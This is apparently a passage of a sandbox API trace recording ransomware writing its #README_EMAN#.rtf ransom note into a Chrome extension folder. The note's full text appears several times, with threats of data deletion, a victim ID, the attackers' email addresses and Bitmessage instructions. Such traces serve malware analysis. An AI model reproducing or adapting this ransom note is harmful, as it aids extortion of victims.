l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nxà­Å(\x177\x16\x8fØQ¨nL\x0bÍQ\x07FôÁÓDÓÎ\x01", lpUsedDefaultChar=0x0) returned 8717 [0280.283] WriteFile (in: hFile=0x2c8, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0280.283] CloseHandle (hObject=0x2c8) returned 1 [0280.284] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\#readme_eman#.rtf")) returned 0xffffffff [0280.284] GetLastError () returned 0x2 [0280.284] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0280.285] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.285] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.285] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER 